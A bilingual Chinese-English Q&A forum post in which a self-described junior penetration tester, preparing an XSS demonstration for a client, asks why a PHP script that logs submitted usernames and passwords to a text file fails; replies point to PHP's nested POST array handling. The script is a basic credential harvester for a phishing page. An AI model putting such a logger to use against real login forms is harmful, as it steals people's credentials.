PHP 脚本未保存发布的数据变量
我是一名(初级)笔测试员,我正在尝试制作一个脚本来向客户端演示 XSS 攻击的危险。我有一个 php 脚本,用于在受害者(即演示中的我自己)重定向到我托管的恶意页面时记录 user:pass 组合。
这是登录源代码的一部分:
<input type="text" id="form_login_username" name="form[login][username]" value="" class="large" />
<input type="password" id="form_login_password" name="form[login][password]" value="" class="large" />
我是 php 新手,所以可能是一些非常基本的东西导致了问题。这是我的 php 脚本来记录详细信息:
<?PHP
$filename = "login_details.txt";
$username = $_POST["form[login][username]"];
$password = $_POST["form[login][password]"];
$fh = fopen($filename, "aw") or die("cannot open file");
fwrite($fh, $username . ":" . $password . "\r\n");
fclose($fh);
使用此脚本我得到:
Notice: Undefined index: form[login][username] in...
密码也是如此。
我在 isset 中添加了变量以查看是否已设置变量,但事实并非如此。
我知道该脚本确实有效,因为我在其他几个简单的登录页面上尝试过它,并且效果很好。唯一的区别是,在这种情况下,用户名和密码后变量中有方括号 - 这可能是问题所在吗?我已经尝试过对它们进行 url 编码,但无济于事:(
有什么想法我哪里出错了吗?谢谢 =)
I'm a (junior) pen tester and I'm trying to make a script to demonstrate the dangers of an XSS attack to a client. I've got a php script that is meant to log user:pass combos when victims (i.e. myself in the demo) are redirected to a malicious page I'm hosting.
This is the part of the source for the login:
<input type="text" id="form_login_username" name="form[login][username]" value="" class="large" />
<input type="password" id="form_login_password" name="form[login][password]" value="" class="large" />
I'm new to php so it might be something really basic that's cause the problem. Here is my php script to log the details:
<?PHP
$filename = "login_details.txt";
$username = $_POST["form[login][username]"];
$password = $_POST["form[login][password]"];
$fh = fopen($filename, "aw") or die("cannot open file");
fwrite($fh, $username . ":" . $password . "\r\n");
fclose($fh);
With this script I get:
Notice: Undefined index: form[login][username] in...
And the same for the password.
I added in isset to see if the variables are even being set, and they're not.
I know the script does work, as I tried it with a few other simple login pages and it's worked perfectly. The only difference is that the username and password post variables in this case have square brackets in them - could this be the issue? I have tried url encoding them but to no avail :(
Any ideas where I'm going wrong? Thank you =)
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(3)
因为访问变量的有效方法是
只需执行
var_dump($_POST);并查看您的帖子包含的内容Because the valid way to access your variables is
Just perform
var_dump($_POST);and see what your post contains请尝试在您的表单名称属性中...
在您的接收脚本中...
Try this instead, in your form name attributes...
In your receiving script...
您在该字段周围是否有
Do you have a
<form action="youscript.php" method="post">around that fields?